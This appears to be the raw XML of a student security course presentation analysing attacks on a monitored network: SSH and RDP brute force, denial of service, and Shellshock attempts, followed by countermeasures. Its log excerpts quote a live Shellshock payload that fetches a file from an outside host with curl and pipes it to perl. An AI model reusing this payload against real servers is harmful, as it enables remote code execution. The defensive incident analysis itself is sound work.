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9" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="285" r:id="rId11"/>
    <p:sldId id="281" r:id="rId12"/>
    <p:sldId id="282" r:id="rId13"/>
    <p:sldId id="283" r:id="rId14"/>
    <p:sldId id="286" r:id="rId15"/>
    <p:sldId id="287" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="289" r:id="rId18"/>
    <p:sldId id="290" r:id="rId19"/>
    <p:sldId id="291" r:id="rId20"/>
    <p:sldId id="267" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="272" r:id="rId23"/>
    <p:sldId id="269" r:id="rId24"/>
    <p:sldId id="27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17" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="109" d="100"/>
          <a:sy n="109" d="100"/>
        </p:scale>
        <p:origin x="-2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4D35-D3E0-4E93-97C3-CB205F8FE028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F9143-49D0-4779-AD1D-B60EF567DE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0665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9143-49D0-4779-AD1D-B60EF567DE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99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9143-49D0-4779-AD1D-B60EF567DE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80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9143-49D0-4779-AD1D-B60EF567DE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036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F9143-49D0-4779-AD1D-B60EF567DE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41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280475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11897A2-63F1-489B-A527-010F479D51D2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0D58617-7BD9-4B1A-8FC2-7F61C0F446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Creativity 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06710"/>
            <a:ext cx="8062912" cy="2331840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>…or something like that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Peter Haile | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Nabeel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Lalji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> | Cole Rees | David Tran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>COMP 8506 – Final Project Presentation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39316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/>
              <a:t>Evidence of SSH Brute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Force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552575"/>
            <a:ext cx="7010400" cy="34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923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Brute Force &amp; Denial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>via RDP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542553"/>
            <a:ext cx="6934200" cy="33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425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09550"/>
            <a:ext cx="6096000" cy="46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119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Brute Force &amp; Denial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>via RDP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81150"/>
            <a:ext cx="5972175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1581150"/>
            <a:ext cx="3071813" cy="34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033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Most Significant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45720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the beginning…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“Dictionary attack” of WEB-CGI scripts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3987" y="1237771"/>
            <a:ext cx="32480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6651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Most Significant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Who was responsible?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Digital Ocean (188.266.143.68)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Netherlands, provides Cloud Hosting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594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Most Significant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WEB-CGI were attempted Shellshock attacks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ym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Bash history revealed this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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19350"/>
            <a:ext cx="8153400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“GET /cgi-bin/test/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test.cgi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HTTP/1.0” 404 219 “() {:; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”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105150"/>
            <a:ext cx="8153400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“GET /cgi-bin/test/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test.cgi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HTTP/1.0” 200 92 “() {:; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”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842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Most Significant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42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Who was 202.28.77.53?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33794" name="Picture 2" descr="https://lh3.googleusercontent.com/swUKq3YyprbCl2bbDYbrQYerlxJT5QLbvOrtf_Nd6JYkdpno5UGXS-1jD4uVfBS7JONuOdLzPlmWNmeBY7_IIXyUhKQ4KCUtCthGcnUkA4Q5lOGUEhMs9Q_aD2v5cF_C5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14550"/>
            <a:ext cx="8572500" cy="2571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3030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Most Significant Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35842" name="Picture 2" descr="https://lh4.googleusercontent.com/2EZYyX7XyR6a9gpeOtdmLbqn-bnK7HYLDJh3LgvxdPltzaJv6sOAqUG3uin08M3YAR_PJD87V-LrfB-9D36v79MM69Kp-ahlMgcwU_b-XF7qHc_zctxYwM9ADpoKmhb65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488" y="1412875"/>
            <a:ext cx="3899312" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35844" name="Picture 4" descr="https://lh6.googleusercontent.com/xtEb5h5gWS6qr0xjJ5zt9arxZQgxRPRC_SaTQvj4WFC5qL-sA4_qS4WjPzbrByy82Yp3HFjazYu7liaI4-UXINMakRP3U3JkNjPfdE2If-LLflXCqgQ7YgH10hjPL3gC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28750"/>
            <a:ext cx="3903231" cy="213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3537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Most Significant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Contacted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Chulalongkorn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Waiting for response…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15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Discussion of System Vulnerabilities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Happened to Our Network?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Our Most Significant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack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2264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Measures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="https://blog.digicert.com/wp-content/uploads/2014/09/Shellsho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581150"/>
            <a:ext cx="2565275" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1367640"/>
            <a:ext cx="5638800" cy="431730"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 71956 h 431730"/>
              <a:gd name="connsiteX1" fmla="*/ 71956 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 431730"/>
              <a:gd name="connsiteX2" fmla="*/ 5566844 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 431730"/>
              <a:gd name="connsiteX3" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 71956 h 431730"/>
              <a:gd name="connsiteX4" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 359774 h 431730"/>
              <a:gd name="connsiteX5" fmla="*/ 5566844 w 5638800"/>
              <a:gd name="connsiteY5" fmla="*/ 431730 h 431730"/>
              <a:gd name="connsiteX6" fmla="*/ 71956 w 5638800"/>
              <a:gd name="connsiteY6" fmla="*/ 431730 h 431730"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY7" fmla="*/ 359774 h 431730"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5638800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5566844" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5606584" y="0"/>
                  <a:pt x="5638800" y="32216"/>
                  <a:pt x="5638800" y="71956"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5638800" y="359774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5638800" y="399514"/>
                  <a:pt x="5606584" y="431730"/>
                  <a:pt x="5566844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Shellshock</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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57200" y="1799370"/>
            <a:ext cx="5638800" cy="1229580"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1229580"/>
              <a:gd name="connsiteX1" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1229580"/>
              <a:gd name="connsiteX2" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 1229580 h 1229580"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 1229580 h 1229580"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 12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1229580">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5638800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638800" y="1229580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12295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32" tIns="22860" rIns="128016" bIns="2286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Patch Bash to a “secured” version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b="0" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Adopt sandboxing and process access control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="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b="0" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Create targeted prevention policies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="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b="0" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Install host-based firewall systems &amp; harden server kernels</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="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1400" b="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57200" y="3028950"/>
            <a:ext cx="5638800" cy="431730"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 71956 h 431730"/>
              <a:gd name="connsiteX1" fmla="*/ 71956 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 431730"/>
              <a:gd name="connsiteX2" fmla="*/ 5566844 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 431730"/>
              <a:gd name="connsiteX3" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 71956 h 431730"/>
              <a:gd name="connsiteX4" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 359774 h 431730"/>
              <a:gd name="connsiteX5" fmla="*/ 5566844 w 5638800"/>
              <a:gd name="connsiteY5" fmla="*/ 431730 h 431730"/>
              <a:gd name="connsiteX6" fmla="*/ 71956 w 5638800"/>
              <a:gd name="connsiteY6" fmla="*/ 431730 h 431730"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY7" fmla="*/ 359774 h 431730"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY8" fmla="*/ 71956 h 43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431730">
                <a:moveTo>
                  <a:pt x="0" y="71956"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="32216"/>
                  <a:pt x="32216" y="0"/>
                  <a:pt x="71956" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5566844" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5606584" y="0"/>
                  <a:pt x="5638800" y="32216"/>
                  <a:pt x="5638800" y="71956"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5638800" y="359774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5638800" y="399514"/>
                  <a:pt x="5606584" y="431730"/>
                  <a:pt x="5566844" y="431730"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="71956" y="431730"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="32216" y="431730"/>
                  <a:pt x="0" y="399514"/>
                  <a:pt x="0" y="359774"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="7195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9655" tIns="89655" rIns="89655" bIns="89655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SSH Brute Force</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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7200" y="3460680"/>
            <a:ext cx="5638800" cy="1229580"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1229580"/>
              <a:gd name="connsiteX1" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1229580"/>
              <a:gd name="connsiteX2" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 1229580 h 1229580"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 1229580 h 1229580"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 122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1229580">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5638800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638800" y="1229580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12295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32" tIns="22860" rIns="128016" bIns="2286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Implement IPS to keep tabs on captured IP addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1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Ensure FW blocks offending countries’ IP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Configure SSH to max. failed attempts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Should be an indefinite ban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xmlns="" val="67160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3" grpId="0" animBg="1"/>
      <p:bldP spid="13" grpId="1" animBg="1"/>
      <p:bldP spid="14" grpId="0"/>
      <p:bldP spid="1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Measures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://upload.wikimedia.org/wikipedia/en/b/b0/Remote_desktop_connection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1150"/>
            <a:ext cx="2438400" cy="2438400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>
          <a:xfrm>
            <a:off x="2895600" y="1308846"/>
            <a:ext cx="5638800" cy="407745"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 67959 h 407745"/>
              <a:gd name="connsiteX1" fmla="*/ 67959 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 407745"/>
              <a:gd name="connsiteX2" fmla="*/ 5570841 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 407745"/>
              <a:gd name="connsiteX3" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 67959 h 407745"/>
              <a:gd name="connsiteX4" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 339786 h 407745"/>
              <a:gd name="connsiteX5" fmla="*/ 5570841 w 5638800"/>
              <a:gd name="connsiteY5" fmla="*/ 407745 h 407745"/>
              <a:gd name="connsiteX6" fmla="*/ 67959 w 5638800"/>
              <a:gd name="connsiteY6" fmla="*/ 407745 h 407745"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY7" fmla="*/ 339786 h 407745"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY8" fmla="*/ 67959 h 40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407745">
                <a:moveTo>
                  <a:pt x="0" y="67959"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="30426"/>
                  <a:pt x="30426" y="0"/>
                  <a:pt x="67959" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5570841" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5608374" y="0"/>
                  <a:pt x="5638800" y="30426"/>
                  <a:pt x="5638800" y="67959"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5638800" y="339786"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5638800" y="377319"/>
                  <a:pt x="5608374" y="407745"/>
                  <a:pt x="5570841" y="407745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="67959" y="407745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="30426" y="407745"/>
                  <a:pt x="0" y="377319"/>
                  <a:pt x="0" y="339786"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="6795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74" tIns="84674" rIns="84674" bIns="84674" numCol="1" spcCol="1270" anchor="ctr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RDP Brute Force</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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2895600" y="1716592"/>
            <a:ext cx="5638800" cy="686204"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 686204"/>
              <a:gd name="connsiteX1" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 686204"/>
              <a:gd name="connsiteX2" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 686204 h 686204"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 686204 h 686204"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 68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6204">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5638800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638800" y="686204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6862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32" tIns="21590" rIns="120904" bIns="21590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300" b="0" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Configure FW to allow only known IPs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="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300" b="0" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Set max. failed attempts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="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1300" b="0" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="2402796"/>
            <a:ext cx="5638800" cy="407745"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 67959 h 407745"/>
              <a:gd name="connsiteX1" fmla="*/ 67959 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 407745"/>
              <a:gd name="connsiteX2" fmla="*/ 5570841 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 407745"/>
              <a:gd name="connsiteX3" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 67959 h 407745"/>
              <a:gd name="connsiteX4" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 339786 h 407745"/>
              <a:gd name="connsiteX5" fmla="*/ 5570841 w 5638800"/>
              <a:gd name="connsiteY5" fmla="*/ 407745 h 407745"/>
              <a:gd name="connsiteX6" fmla="*/ 67959 w 5638800"/>
              <a:gd name="connsiteY6" fmla="*/ 407745 h 407745"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY7" fmla="*/ 339786 h 407745"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY8" fmla="*/ 67959 h 40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407745">
                <a:moveTo>
                  <a:pt x="0" y="67959"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="30426"/>
                  <a:pt x="30426" y="0"/>
                  <a:pt x="67959" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5570841" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5608374" y="0"/>
                  <a:pt x="5638800" y="30426"/>
                  <a:pt x="5638800" y="67959"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5638800" y="339786"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5638800" y="377319"/>
                  <a:pt x="5608374" y="407745"/>
                  <a:pt x="5570841" y="407745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="67959" y="407745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="30426" y="407745"/>
                  <a:pt x="0" y="377319"/>
                  <a:pt x="0" y="339786"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="6795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74" tIns="84674" rIns="84674" bIns="84674" numCol="1" spcCol="1270" anchor="ctr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RDP Denial of Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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2895600" y="2810542"/>
            <a:ext cx="5638800" cy="897345"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 897345"/>
              <a:gd name="connsiteX1" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 897345"/>
              <a:gd name="connsiteX2" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 897345 h 897345"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 897345 h 897345"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 8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897345">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5638800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638800" y="897345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8973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32" tIns="21590" rIns="120904" bIns="21590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300" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Implement IPS to BAN captured IP addresses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300" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Ensure FW blocks offending countries’ IP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300" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Should be an indefinite ban</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="130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1300" b="0" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Freeform 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3707886"/>
            <a:ext cx="5638800" cy="407745"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 67959 h 407745"/>
              <a:gd name="connsiteX1" fmla="*/ 67959 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 407745"/>
              <a:gd name="connsiteX2" fmla="*/ 5570841 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 407745"/>
              <a:gd name="connsiteX3" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 67959 h 407745"/>
              <a:gd name="connsiteX4" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 339786 h 407745"/>
              <a:gd name="connsiteX5" fmla="*/ 5570841 w 5638800"/>
              <a:gd name="connsiteY5" fmla="*/ 407745 h 407745"/>
              <a:gd name="connsiteX6" fmla="*/ 67959 w 5638800"/>
              <a:gd name="connsiteY6" fmla="*/ 407745 h 407745"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY7" fmla="*/ 339786 h 407745"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY8" fmla="*/ 67959 h 40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407745">
                <a:moveTo>
                  <a:pt x="0" y="67959"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="30426"/>
                  <a:pt x="30426" y="0"/>
                  <a:pt x="67959" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5570841" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5608374" y="0"/>
                  <a:pt x="5638800" y="30426"/>
                  <a:pt x="5638800" y="67959"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5638800" y="339786"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5638800" y="377319"/>
                  <a:pt x="5608374" y="407745"/>
                  <a:pt x="5570841" y="407745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="67959" y="407745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="30426" y="407745"/>
                  <a:pt x="0" y="377319"/>
                  <a:pt x="0" y="339786"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="6795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674" tIns="84674" rIns="84674" bIns="84674" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl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0" kern="1200" dirty="0" smtClean="0"/>
              <a:t>RDP in General</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" b="0" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="4115632"/>
            <a:ext cx="5638800" cy="633420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 633420"/>
              <a:gd name="connsiteX1" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 633420"/>
              <a:gd name="connsiteX2" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 633420 h 633420"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 633420 h 633420"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 63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33420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5638800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638800" y="633420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6334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32" tIns="21590" rIns="120904" bIns="21590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300" b="0" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Don’t use outdated Windows operating systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="0" kern="1200" dirty="0"/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300" b="0" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Refrain from custom OS like “Black Edition” in corporate environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="0" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="67160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Measures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="http://1.bp.blogspot.com/_JiH-ZdsznV8/TPP44MLDsWI/AAAAAAAAAD8/UZINpiKv6kI/s1600/xss-threat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428750"/>
            <a:ext cx="2476500" cy="2705100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
